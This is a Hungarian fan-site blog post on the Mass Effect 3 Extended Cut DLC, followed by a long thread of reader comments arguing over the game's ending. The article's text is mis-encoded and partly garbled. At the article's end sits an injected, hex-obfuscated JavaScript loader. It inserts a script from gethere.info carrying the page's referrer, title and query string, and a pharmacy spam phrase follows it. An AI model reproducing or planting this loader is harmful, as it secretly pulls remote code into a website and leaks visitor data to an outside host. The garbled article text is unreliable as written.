Mass Effect 3 Extended Cut DLC – marad a pocsA�k befejezA�s

Csak nA�mileg ki lesz egA�szA�tve a dolog, valamivel bA�vebb informA?ciA?t kapunk majd a sorozat lezA?rA?sA?val kapcsolatban.

A sajtA?kA�zlemA�ny szerint bA�vA�tett jelenetekkel fogunk talA?lkozni az ingyenes DLC letA�ltA�se utA?n, nA�mileg nagyobb kontextusba helyezik Shepard parancsnok tA�rtA�netA�nek lezA?rA?sA?t. Ugyanakkor kiemelik, hogy a Bioware ragaszkodik a sajA?t mA�vA�szeti elkA�pzelA�seihez, azaz a bA�vA�tA�sen kA�vA?l nem vA?ltoztatjA?k meg a befejezA�st; tovA?bbra is bA?szkA�k az eredeti munkA?jukra.

A DLC tehA?t nA�mi toldalA�k lesz, valA?szA�nA�leg olyan A?tvezetA� videA?kat raknak be, amik kimaradtak az eredeti jA?tA�kbA?l – ezekhez nagy valA?szA�nA�sA�ggel a szinkron is meg van. (PA�ldA?ul szemfA?les rajongA?k rA?akadtak olyan hangfileokra, amik arrA?l tanA?skodnak, hogy a Normandy kimenekA�tette Shepard csapattA?rsait a FA�ldrA�l.)

Nagy kA?r ezA�rt a dA�ntA�sA�rt – vA�lemA�nyem szerint ezzel vA�gkA�pp elA?stak egy ragyogA? sci-fi franchiset. A�s kA?r a Bioware-A�rt is, ami hosszA? ideig a legjobb jA?tA�kfejlesztA� cA�gek sorA?ban volt, A?m A?gy tA�nik, A�k mA?r nem azok, akik rA�gen voltak.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])} fluoxetine sales.

Szerző:

Merras

A Miyazaki Jun nem álnév, echte original japán importárú vagyok apai részről. Amikor épp nem valami sci-fi honlapot hegesztek, vagy rendezvényt csinálok, akkor kénytelen vagyok dolgozni, ennek kapcsán online marketing tanácsadóként tevékenykedem.

308 thoughts on “Mass Effect 3 Extended Cut DLC – marad a pocsA�k befejezA�s”

  1. Micsoda egy szenny csapat ez a Bioware, csak hat halhatatlan címet adtak a világnak, meg egy rossznak ítélt befejezést, és mire emlékszik a játékos társadalom? Megyek keresek egy vödröt.

  2. Én azért még nem ásnám el előre ezt a dolgot, lehet ebből még valami jó is. a BioWare eleve nem úgy tervezte a trilógiát hogy az esetleges folytatás a ME3 után játszódna időben, hanem a 3 játék előtt/közben. (legalábbis a Final Hours of ME3-ban ezt írták) Így a vége egész elviselhetőnek tűnik, már ha tényleg sikerül betömniük azokat a bizonyos logikai lyukakat.

    1. Az egy dolog, hogy előzményjátékra terveztek. De milyenre? A sztorit megelőző időben nem igazán voltak olyan eszeveszett nagy hősök, maximum Grissom, de az ő vakvilágba repülése nem hiszem hogy valami epikus sztorit eredményezne.

      Én egy dolgot tudok feltételezni ha a Mass Effect előzményéről van szó. Az pedig egy stratégiai játék. Bolygófoglalás, benépesítés, más fajok elnyomása. Nem hiszem, hogy véletlenül kapta meg a Bioware a C&C: Generals projektet a nyakába, mikor nem nagy stratégiai játék gyártó cégről van szó. Szerintem az egy beáldozható projekt lesz azért, hogy elég tapasztalatot szerezzenek egy ME stratégia megalkotásához.

      1. Szerintem Anderson és a First Contact War megfelelő választás lehet.. Persze Anderson arcát már ismerjük, ez némi kétkedésre adhat okot 🙂

        1. Anderson sem volt egy igazán ikonikus karakter, ráadásul a sztorija nagyját már rég ellőtték.
          A First Contact War-t sem tartom olyan környezetnek ahol egy igazi RPG-t végig lehetne játszani.

      2. Rengeteg lehetőség van még ebben az univerzumban, nem feltétlenül kell már ismert történeteket, szereplőket venni egy új játékhoz. Nem is kell egy világmegváltó főszereplő, személy szerint már unom hogy rengeteg játékban mi vagyunk a kiválasztott/atyaúristen/szupersztár. Ha mindenképp RPG vonalon akar maradni a sorozat példának okán egy egyszerű zsoldost is alakíthatna a játékos. Stratégiai vonalon se lenne hülyeség, csak értsenek hozzá, a kampányok pedig adottak: Első Kapcsolat Háború, Geth-Quarián háború, Rachni háború, Krogan lázadások, akár még a jelenlegi Reaper háború is.

  3. Előre jelzem, hogy Mass Effect fan vagyok és nekem igenis kifejezetten tetszett a befejezés, nem volt azzal semmi baj, attól még, hogy nem olyan lett amit vártak az nem egyenlő azzal, hogy rossz.

  4. Én inkább az emberek intelligenciahányadosát látom “lejtmenetben”, és szánalmasnak tartom ezt az orbitális felháborodást az egészen. Alig pár tucat jel mutat csak arra, hogy amit látunk a végén, az nem egészen az, aminek látjuk, és ez az úgynevezett szépségtapasz majd talán segít, hogy többen meglássák, mi is megy ott végbe, de persze írjuk csak le előre, és nyomassuk az “én soha többet nem veszek BioWare játékot” mert a megannyi tökéletes sztori/játék egyikének a vége (és CSAK a vége) nem tetszett, és ezek a kis béna játékkészítők nem azt csinálják, amit mi mondunk, hanem a SAJÁT történetüket van pofájuk a SAJÁT elképzelésük szerint megcsinálni. Egy könyvet sem fog senki az írója képébe vágni, hogy mégis hogy merészelt ilyen befejezést írni neki, és azonnal írja át.. Én kifejezetten örülök, hogy nem hagyták magukat.

    1. Egyetértek. A befejezés, ha egy kicsit oda figyel az ember, a zseniális szintet súrolja. Legalábbis a játékok 90%-ához képest.

      Amúgy Shepard a lore-szerint (már ha a legjobb befejezést annak vesszük) túléli. Egy csomó ember azon van kiakadva, hogy meghal, vagy azon, hogy nem csillogós happy-end a vége. Amire már a játék közepe felé számítani lehet. Pontosan az a jó ebben a játékban, hogy nem (általános értelemben véve) pozitív a vége.Meg hogy a döntéseidnek igazából nem volt súlya. Szerintem pont ettől reális, és hihető.Nálam első végigjátszásnál kipusztult az egész galaxis. 😀
      És hatalmas élmény volt. Öt percig egy helyben ültem a credits után.

      Ha az lett volna a vége, hogy a reaparek nagy robbanások közepette,sikoltozva elviharzanak, aztán Shep a barátai és társai körében, konfettizáporban végigvonul egy nagy főúton, amint a galaxis minden népe önfeledten ünnepli, csalódottan álltam volna fel. ..Jó mondjuk nem,mert a játék addig is az egyik legjobb volt amivel valaha játszottam, de nem lett volna akkora katarzis, mint amit kaptam ettől a befejezéstől.

      1. A befejezés a zseniális határát súrolja? Ha nincs benne indoktrináció, akkor a nyáltenger határát súrolja.
        „Fú, tök ügyes vagy, hogy eljutottál ide, te vagy a tuti artz, ezért most választhacc! Fú, és van egy olyan lehetőség is, hogy robot meg élő egy(b)esül és körbenyalják egymást.”
        Ha már végiggörcsöltem azt a majd 100 órát, akkor legalább valami epicness legyen.

  5. Engem a befejezésben csak az bosszantott, hogy az eddigi cselekedeteink feleslegesek voltak, semmi feedback nem volt azzal kapcsolatban, hogy azok milyen kihatással voltak a galaxis sorsára. Csak az számít, amit az utolsó percben döntöttem el? Hát én nem úgy éreztem, hogy erről szólna ez a játék. Egyedül Stephen King vígasztal: “Nem a végkifejlet számít, hanem az, hogy hogyan jutsz el oda”. Nem szó szerint, de valami ilyesmi 🙂

  6. Továbbra sem az a baj,hogy meghal a főhös, hanem, hogy hiányzik az a döntési szabadság és változatos, teljesen egyedi befejezés amit ígértek. Lehetnek büszkék a – szar- munkájukra, de attól az még nem lesz jó. Valójában ha nem csinálnak ekkora hírverést nem is lett volna baj. Csak mindenki várta már, hogy milyen egyedi vége lesz annak a történetnek, amit már ÖT éve próbál alakítani. Nos, semmilyen. Ezért rossz a vége. Továbbra sem értem miért lehet ez a befejezés jó és hibátlan. A sulykolás teóriát vágom, de ez a rajongók önvigasztalása, valójában nincs szilárd tény ami alátámasztaná.

  7. “Nagy kár ezért a döntésért – véleményem szerint ezzel végképp elástak egy ragyogó sci-fi franchiset. És kár a Bioware-ért is, ami hosszú ideig a legjobb játékfejlesztő cégek sorában volt, ám úgy tűnik, ők már nem azok, akik régen voltak.” Még jó, hogy csak a te véleményed szerint… Egy olyan befejezésért, ami nem mindenkinek tetszett maradéktalanul elég ahhoz, hogy a Mass Effect-szériát és a BioWare-t (nagy W!) máris “kukázzuk”? Na ne viccelj már velem… A befejezés tökéletes, csak annak a felvezetése kissé silány, ezt egészítik ki most a fejlesztők és ennek örülni kellene!

  8. Én még nem toltam ki, megvárok egy pár DLC-t. De akármi is van a végén, tegyük hozzá, hogy ez scifi, és időutazás még nem is volt benne. 😀 Onnantól, hogy Shepard a ME2 elején kb. meghal és gépekkel újraélesztik, én nem lepődnék meg semmin.

  9. Ez a “semmi döntésnek nincs kihatása” is hülyeség. Egy dolog, hogy nem mutatják cutscene-ben, hogy pl a rachnik nekimennek a reapereknek, de ha nincs elég nagy seregünk, a végső robbantással nem csak a reapereket, de fél Londont és az ott harcoló embereket is megsemmisítjük…

  10. Na most lehet háborogni a befejezésén, én sem szeretem, de ez valahol DIREKT ilyenre lett csinálva, minden szálat elvarrandó, minden hidat felégetendő, hogy még véletlenül se lehessen folytatni 3 részesre szánták, és olyan is lett a befejezése, hogy itt megálljon a dolog. Ennyi a történet…

  11. A Bioware helyett pedig az EA-t okoljátok…

    Ők erőltetik mindenre, és mindenkire a kommersz popcorn / chips kategóriás játékokhoz vezető mentalitást, ami ócska semmire sem jó programoknál még jó is, mert legalább csilli villi, felszínes könnyen emészthető tömegfogyasztásra alkalmas valami lesz belőle. De olyan programoknál, és csapatoknál mint teszem az a Bioware, a végeredmény csak egy amúgy nívós mű elrontására alkalmas.

    Jópár nagy nevet, és fejlesztőcsapatot elcsesztek már a marhaságaikkal. Mondjak neveket? Szerintem 2 elég is lesz…
    Red alert, és Tiberina sun. Ide vezet, ha valamire ráteszik a kezeiket.

    Az isten mentsen meg bármit ami valódi érték a karmaiktól!
    És az isten mentse meg a Bioware-t tőlük, amíg nem késő!

  12. Azért ha megválaszolják a kérdéseket, beletesznek némi epikusságot, kapunk rendes búcsút és kikupálják a logikátlanságokat, jó lesz ez a befejezés. Nem kell ezt átírni, csak megírni.

  13. Tehát most kidobják ezt,tovább szarják a wc peremét,persze mi rajongók továbbra is felháborodottak maradunk.Azután a BioWare nyilatkozik,hogy hát mi olyan nagyon jó arcok voltunk,hogy eleget tettünk a rajongók kívánságának.Mi meg belefáradunk ebbe és ennyi… Vagy még mindig Indoctrination Theory 😀

  14. Nem is értem, hogy valaki, hogy lehet Mass Effect rajongó, ha nuku képzelőereje van… A befejezéssel nincs semmi baj, viszont vannak dolgok, amikre tényleg jó lenne válaszokat kapni.

    Érdekes a Mass Effect 2 vége miatt nem siránkozott senki? Mennyiben különbözik a 3-étól? Eláruljam? Semmivel nem különb. Hoztál egy csomó döntést, de semmi hatása nem volt a végére, volt két befejezés, két színnel. Felrobban a Collector bázis(sárga robbanás), megmented a Collector bázist(kék robbanás). A 3. részben lezárod a 2. részben félbemaradt ügyeket és egyesíted a galaxis fajait. Ezzel vagy hatással a végére. Kevesebb a szabadság a 3. rész utolsó küldetésében, mint a 2. részben, sőt még a boss harc is hiányzik, de számomra sokkal jobban tetszik így a Mass Effect, hogy kicsit ködös a vége. Amúgy ennél a cikknél leírtam a spekulációm a játék végével kapcsolatosan, hogy ne csak a levegőbe beszéljek:
    http://www.masseffect.hu/archives/6246

    1. Ja, volt befejezés két színnel. Meg előtte egy pár tucat animáció, amiben meghalnak a társaid, ha nem csináltad meg a küldetéseiket, vagy ha rosszul választottál társakat. Ott volt az egész banda, együtt mentetek be, és ha ügyes voltál, együtt jöttetek ki. Itt mi volt? Semmi. Akár életben tartottad a társaidat, akár nem, akár hűségesek voltak, akár nem, a végén nem látni őket harcolni, akik meg veled vannak, azok meg elrepülnek a Normandy-val, és landolnak valami ismeretlen bolygón.

    2. Akkor ha még több logikát nélkülöző elemet raknának bele neked még jobban tetszene mert még jobban “ködös” lenne? Sőt tele lehetne rakni az egész játékot ilyen “isten gyerekekkel”, meg álmokkal, és akkor már nem csak a játék vége lenne ködös hanem az egész játék, akkor már igazán epikus lenne a ködösség, és sírva játszanál olyan jó lenne ….
      Az meg h a mass effect 2 vége semmiben nem különbözik a 3-tól az egy vicc, szerintem te se gondoltad ezt komolyan 🙂
      Alapvető különbség, hogy a második részt nem befejezésnek szánták, hanem egy fajta átvezetőnek, vagy felkészítésnek az epikus harcra. Gondoljunk csak arra, mikor a második részben az egyik betöltő képernyő ilyen szöveget láthatunk: A mass effect 2-ben meghozott döntéseinknek a 3ban komoly következménye lesz. Ezért nem érdekel senkit a kettő végén az h milyen színnel robban fel a collector bázis, mert ennek majd a 3. részben komoly következménye lesz. Az más kérdés, hogy ez – mint a legtöbb mass effect 3hoz kapcsolódó ígéret- hazuság, kezdve azzal, hogy: “Take Earth Back” …

  15. Olyan érzése van az embernek…. mint amikor eldöntheti hogy a vonat alá engedi a kutyáját, vagy az autó alá…. Pedig tudja hogy a kertbe is engedhetné, de csak két szar kimenetel között választhat.

    Elhúzzák előttünk a mézes madzagot az előző két rész alatt, választhatunk, dönthetünk…
    de így minek? Minek válasszak a lehetőségek közül? Úgyis ugyan az a vége… Mivel megígérték hogy a 3 vége függ az előző kettőben játszottaktól. Nem tökmind1? Ha megölöd a racsnikat ha nem, ha megölöm Wrex-et ha nem… Tökmind1…. becsukott szemmel találomra végignyomkodhatod az előző 2őt… semmi nem fogsz változtatni. Így minek?
    Ez olyan mintha kitöltenél egy tesztet hogy homokos vagy-e vagy sem… és az eredmények a következők lehetnek:
    1 – F*sz szop*
    2 – Meleg
    3 – Homokos

    Idegesítő….

    És akkor képzeljük hozzá hogy utána jön a doki és ad még 1 papírt amin meg van indokolva miért vagy homokos..

    Remélem akik eddig nem érezték át, ezután talán átfogják…

    Ezért szar a ME3 utolsó percei…

    1. A Mass Effect sok kisebb sztoriból épül fel, ami kapcsolódik ugyan a játék fő vonalához, de csak annyiban, hogy egy idegen faj, vagy azon belül egy nagyobb karakter csatlakozik hozzád a végső harcban, ennyi. Ennél nagyobb hatása nem igen lehet.

      A második részben megismerkedtél egy rakás új karakterrel, továbbgöngyölítetted a kisebb sztoriszálakat, de a végső csatában teljesen mindegy volt, hogy milyen döntéseket hoztál játék közben. A 3. résznek nem csak az utolsó küldetése zárja le a trilógiát, hanem maga a teljes játék. Véget ér a génfalós sztori, véget ér a Quarian vs. Geth sztori… Mit akarsz még látni a végső videóban, ha már játék közben elvarrtad a szálakat? Nem értem… Ha segítettél egy idegen fajnak, melléd állnak. Engem csak az zavart, hogy például nem láthattam a Rachni-okat, vagy például Aria zsoldos hadseregét harcolni. Apróságok, de ezeket mondjuk beletehették volna.

      1. Azért csinálod a küldetéseket, hogy mindenki melléd álljon a végső harcban, azért igyekszel megmenteni mindenkit a második részben, hogy segítsenek neked a 3.ban … ehelyett kapsz egy olyan befejezést ahol mindegy h a gethek halnak ki vagy a quariánok (vagy pl egyik se), mindegy hogy meggyógyítottad-e kroganokat, mindegy hogy ki élte túl a második részt stb. Mert a végén nem látod őket h küzedenének veled együtt, segítenének a harcban, esetleg az oldaladon halnának meg, vagy hogy tovább menjek miattad halnának meg, mert rossz döntöttél …. ez a harc rész bizony hiányzik a végéről, ahol látnád a következményeit a korábbi döntéseidnek
        Ha ez neked apróság akkor ….

    2. Ez egy RPG. Ha ez nem elég indok neked arra, hogy kvázi szabadon megválaszthasd a cselekedeteid akkor nem tudom micsoda. Eljátszhattad saját magad, felépíthettél egy neked tetsző Shepardot. És a végjátéktól fügetlen az még a te Shepardod marad. Ebben volt a lényeg szerintem. Hogy mindenki úgy játszhatta, ahogy akarta. Persze bizonyos keretek közt. De az, hogy ennek a végkimenetelre csekély hatása van, nem hiszem, hogy levon az értékéből. És hiába mondod, hogy végigjátszhatod úgy is, ha előzőleg mindenki meghalt. Az ÉRZÉS nem lenne ugyanaz. És ez az érzés abból jön, hogy újra találkozol azokkal a karakterekkel akit ismersz, és nem tökismeretlen egyénekkel kell végigtolnod a harmadik részt.

        1. De ha TALÁN lesz Mass Effectnek új része lehet hogy ezek a szinek befolyással lesznek.Ha jól láttam a vége felé az eggyik videóban sőt mind a három szinű befejezésben hogy a Reaperek nem elpusztulnak hanem elmennek a földről.Például lehet hogy a kék parancsal magad mellé álitod őket.A Pirossal megölöd egymás ellen forditod őket.A Zöldel pedig örökre kivonod őket a fontos Eseményekből a Galaxisban és örökre a Mélyűrben maradnak.Van esze és ravaszsága a Bioware-nek.De az is lehet hogy arra a sorsa jutott a Mass Effect amire a Star Wars The Knights Of The Old Republic.Mondlyuk én még mái napig is szeretem a Star Mappokat keresni Darth Malak rovására.De a Második részének elsiették a végét és ott is csak annyit lehetet látni minden befejezésben hogy repkednek a Üstökösök az Űrben.Akkor is azt mondták hogy ez az ő salyátos művészetük és büszkék rá.Hát nem értitek szégyellik bevallani a vereséget.Félnek hogy nem fog akkor már olyan jól égni a szénájuk.

  16. Nem tudom egyesek mit képzelnek magukról! Mégiscsak a BioWare SAJÁT szellemi termékéről van szó. A helyükben én is megvédeném azt. Ők így képzelték el a végét és kész… és különben is, nincs jobb dolga annak, aki itt füstölög.

    Nekem tetszett a vége.Valami hasonlóra számítottam, Tudtam, hogy Shepard nem éli túl és szerintem így volt helyes, hogy az univerzumért meghozta az Ultimate Sacrifice-t. Csak a szinek mögött látni kéne némi mögöttes tartalmat… hiányosságok vannak, amit remélem ez a DLC megold.

    SPOILER!!!

    Ja és számítottak a döntéseink.

    Kroganek:
    Ha Wrexet próbálod átvágni, meg kellett ölnöd később és elveszted a krogan haderő nagy részét. Ha nem csinálod meg a bombás küldetést szintén. Ha nem őrizted meg Maelon információt Eve meghal és kevesebb Krogan klán csatlakozik. Ha nem mentetted meg az első részben a Rachni Queent, de a harmadikban a másikat igen, az ki fog írtani egy egész hadosztályt.

    Geth-Quarian ellentét:
    Ha Legiont eladod a Cerberusnak, illetve nem hűséges, vagy meghal, illetve, ha Tali nem éli túl a második részt, vagy nem hűséges, nem lehet békét kötni, választanod kell. Vagyis egy komplett faj fog eltűnni.

    Ezek mind számítanak az EMS-ben, ami Garrus szavaival élve csak ruthless calculus.

    A legrosszabb befejezésnél meg nem London pusztul el, hanem a tűzvihar a Földön söpör végig. ÉS könyörgöm gondoljátok, hogy komplett fajok repkedtek ott a Föld felett?????? Gondoljátok, hogy a civilek is ott harcoltak a háborúban????? A Quarianoknak is volt Civil flottája, ami ha jobban megnéztek később nem is lesz War Asset. Úgyhogy úgy ahogy van baromság, hogy akárhogy döntesz kipusztul a galaxis.

    1. Hát a nagy túrót! Ekkora hülyeséget már régen olvastam.
      Saját szellemi termék.. LOL.
      Ha én közösséget építek, és adok nekik valamit, akkor FELELŐS VAGYOK azért, amit nekik adok. Ha szart adok nekik és emiatt nemtetszésüket nyilvánítják ki és még hülyének is nézem őket, az túl van azon a bizonyos határon.

      Akik szerint a befejezés zseniális, azok válaszolják már meg legyenek szívesek ezeket a kérdéseket, mert különben hülyén halok meg:

      1. A 3 opció kiválasztása közül melyik záró scene a legeredetibb? Nekem a szintézis tetszett, mert f@sza zöld.
      2. Szerintetek az Illusive Man vagy Anderson ért-e előbb a Citadellára azon az úton, amin te is bementél? Vajon verekedtek út közben, vagy csak TIM leült a sarokba, amíg Anderson magyarázott neked rádión?
      3. Szerintetek az összes faj génjeinek átírása (most ne beszéljük arról, hogy ez tömény f@szság) varázsütésre hogyan történik meg? Miért kellene a kaszásoknak kiírtani minden fejlett civilizációt lézerágyúkkal, meg röpködni összevissza, meg mély hangon fenyegetőzni, amikor egyszerűen csak megnyomnak egy gombot, azt’ kész?!
      4. A szintézis miért hoz békét?
      5. Joker mi a fenét keres a pajtikkal egy messzimesszi galaxisban egy őserdő közepén? Nyilván vitte a csajokat magával, meg valahogy Garrus is felsurrant a menekülő hajóra, és majd közösen fognak új fajt alapítani, vagy legalábbis kellemesen szórakozni, amíg valaki vagy valami rájuk nem bukkan.
      6. Melyik az a döntésetek, aminek a súlyát leginkább éreztétek, amikor kiválasztottátok az egyik befejezést? Engem pl. szíven ütött, hogy a szoriból kiderült, hogy ha 10.000-el kevesebb hajót sikerül szereznem az ütközethez, akkor nem is jutok el élve a döntésig.. Ja nem, bocs, ez nem igaz…valójában az volt a gondom, hogy a génfalót megállítottam, és aztán mikor a szintézist választottam.. jah, nem is, félrebeszélek, az volt a probléma gyökere, hogy az ME2 záró küldetésében 2 szereplő híján mindenki meghalt, és ezért nem voltak ott az ME3-ban, és a végén sem, és a kissrác, akinek minden szavát elhittem, mert átlátszóan ragyogott, hiányolta őket, ezért rácsapott a kezemre, amikor az irányítás befejezést akartam választani (tudjátok, aminek az a lényege, hogy kék)…

      Naiv és felületes gondolkodásra kapcsolva el tudom fogadni, hogy zseniális a befejezés. De ettől megfájdul a fejem, sajnálom.

      1. Sokan egyszerűen nem fogják fel, hogy mi is a probléma a játék végével, azt hiszik azért reklamál a nép, mert a főhős meghal a végén, pedig pl a Dragon Age-ben is feláldozhatod magad a végén, még se háborogtak a játékosok, hogy ez milyen rossz, sőt az év RPG-je lett.

        Kedves mosomacilany, azt hogy a mass effect a Bioware SAJÁT szellemi terméke, erős túlzás.
        http://www.vidgama.com/2009/04/head-to-head-mass-effect-vs-star-control-ii/
        ajánlom mindenkinek ezt a cikket, aki azt hiszi, hogy a mass effect univerzum valami új és eredeti ötlet
        Nézzük csak még tovább: Van itt egy faj ami mesterséges intelligenciát hozott létre, majd azok fellázadtak ellenük, elzavarva őket a saját bolygójukról -> Battlestar Galactica
        Vannak itt olyan utazást segítő eszközök amivel pillanatok alatt a galaxis másik végében lehetünk, amit egy már azóta eltűnt faj hozott létre -> Csillagkapu
        Van itt egy állomás is, ami a galaktikus civilizáció központja -> Babylon 5
        Vannak faló csápok is -> Dűne
        Vannak mindenféle “emberek” akik tudnak bánni különböző erőkkel (telekinézis pl.) -> Star Wars
        Vannak űrbogarak akik nagyon veszélyesek ha elszaporodnak -> Csillagközi invázió
        Hirtelen ennyi jutott eszembe, de pl. még 2-3 könyvet is tudnék mondani amiből “ötletet merítettek” csak azok nem annyira ismertek.
        Viszont ott van még a játék vége is, ami szintén nem SAJÁT gondolat, hanem a Deus Ex-ből vették át.
        Azt a kérdést tedd fel magadnak: “Ha mindenhonnan összelopod az építőanyagot, majd ebből lopott anyagból építesz egy házat, akkor azt tekintheted-e a saját házadnak?”

      2. 1. Én egy lilának jobban örültem volna:)

        2. TIM valószínűleg eleve ott volt miután leadta a drótot a Reapereknek, hogy a Citadel a catalyst. Anderson pedig magyarázta rádión, hogy a fal megmozdult, a hely folyamatosan változik. Vagy valami ilyesmi… ezt elfogadhatónak találtam. Meg ugye rendesen le voltunk robbanva, lehet tovább feküdtünk eszméletlenül mint Anderson.

        3. Egyetértek, ezt nem kellett volna beletenni. A gombnyomás nem olyan egyszerű, ne felejtsük el, hogy ezek a lehetőségek csak a Cruicible csatlakoztatása után keletkeztek. Amiről meg senkinek lila gőze nem volt, hogy milyen következményekkel jár…

        4. Jó kérdés. A szintetikus és organikus fajok egymás melletti létezése mért hoz okvetlenül utolsó emberig tartó háborút???

        5. EDI kiszámolta a túlélés esélyét és a többiek akarata ellenére inkább elmenekült a géppel együtt, a Földön maradt társaink pedig a citadel teleport sugárba kúsztak ahonnan a Normandy kihalászta őket egy látványos berepüléssel :DD Remélem ezt a részt értelmesen meg tudják magyarázni majd…

        6. Őszintén szólva engem annyira nem zavart, hogy nagyvonalakban egyféleképp érhet véget a sztori, mint ahogy fentebb leírták, közben elég sok súlyos döntést meg kellett hozni, ami hat a játék vége utáni életre (nem mindegy, hogy Gethekkel, Quarianokkal, Rachnikkal, vagy nélkülük megy tovább az élet:)). Persze örültem volna több lehetőségnek, de a befejezésig a 3. rész annyira jó, hogy ezt elnézem. Nekem leginkább az a bajom, hogy a kiscsávó miatt igazából nem tudtunk meg semmit a reaper-ökről. Mármint az eredetükről és a céljaikról.
        -Kisfiú! A mi világunkban a szintetikusok és az organikusok között béke honol, nézd meg! Akkor most mért kell kiirtani a fél Galaxist?
        -ÖMMMM…HÁTTT…MERT SAJT!

        Tudom, el kell képzelni, mekkora gyökér vagyok, hogy mindent el kell magyarázni. De könyörgöm! Ez lenne a játék történetének lényege szerintem! Megválaszolni, hogy mért is történt minden amióta először betettem a Mass Effect 1 DVD-t a meghajtóba.

        Összességében ha tényleg mindent megmagyaráznak rendesen én már boldog leszek ezzel a véggel is:)

        1. SPOILER
          Sztem hasonlóan gondolkodunk, a kérdések épp ezért nem is neked szóltak. 🙂
          A 6. pontban el tudom fogadni azt, hogy lényegében az utolsó döntésed mind1, hogy mi – de akkor a döntés UTÁNI videókban igenis legyen szó arról, hogy mi minden történt eddig. Ha sem az utolsó döntés, sem a lezáró videók nem hivatkoznak a korábbi 3 (!) rész játékára, akkor a sztori szempontjából érdektelen a befejezés.
          Shepard halála nemcsak róla szól – a szerelméről, barátairól is, ők is meghalnak vele együtt vagy elveszítenek egy jó barátot/vezetőt. Ezeket a karaktereket is szeretjük, róluk is tudni akarunk. Viszont ez csak úgy szerepelhet a végjátékban, ha a játék figyelembe veszi, mi minden történt korábban.
          Azzal is egyetértek, hogy a befejezésig a 3. rész nagyon jó. ISZONYAT JÓ, IMÁDOMIMÁDOM! 😎

    2. Ugyan azokat a képsorokat fogod kapni csak más színnel… most akkor a színekhez meg belebeszélem hogy most csak ez most csak az történt, amikor minden képsor egyforma…

      1. De van némi külömbség.A Kék befejezésben a gyilkos fegyvert irányitod és abba pusztul bele Shepard.A Pirosban szétlövöd az irányitó kart és érdekes a végén a Romok között ott van egy nyaklánc amin az áll hogy N7 ez lehet annak a jele hogy Shepard életben van.Mert ha meghalt volna elégett volna mint a másik kettő befejezésben.A zöldben pedig beleugrasz a lézersugárba és szintén elégsz.Igazából ha rendesen végignézzük mind a Három rész eredeti célja nem a Galaxis békélye vagy az Emberiség Dominanciája volt hanem az hogy Shepardot legendává tedd és csapatát.A végén mikor a Nagyapa az Unokályának beszél Shepardról kapsz egy irást hogy te legendává tetted Shepard Kapitányt.Bővitsd élményeidet az új DLC-ékkel.

    1. Arra számítottam, hogy vagy azt sem tudják, hogy mi az az IT, vagy azt mondják, hogy nem arról van szó. Az, hogy olyan befejezést akarnak, ahol mindenki eldöntheti, hogy mi is történt , akár ígéretes is lehet, viszont nagyon könnyen elronthatják ezt is, és igazából ott lehetünk, ahonnan kiindultunk: nincsenek válaszok és rendes befejezés sem… 😕
      Én elfogult vagyok, az IT mellett, szóval ha az is kijön a DLC szerinti befejezésből, akkor: zsíííírsüti. 🙂

Hozzászólások lehetősége itt nem engedélyezett.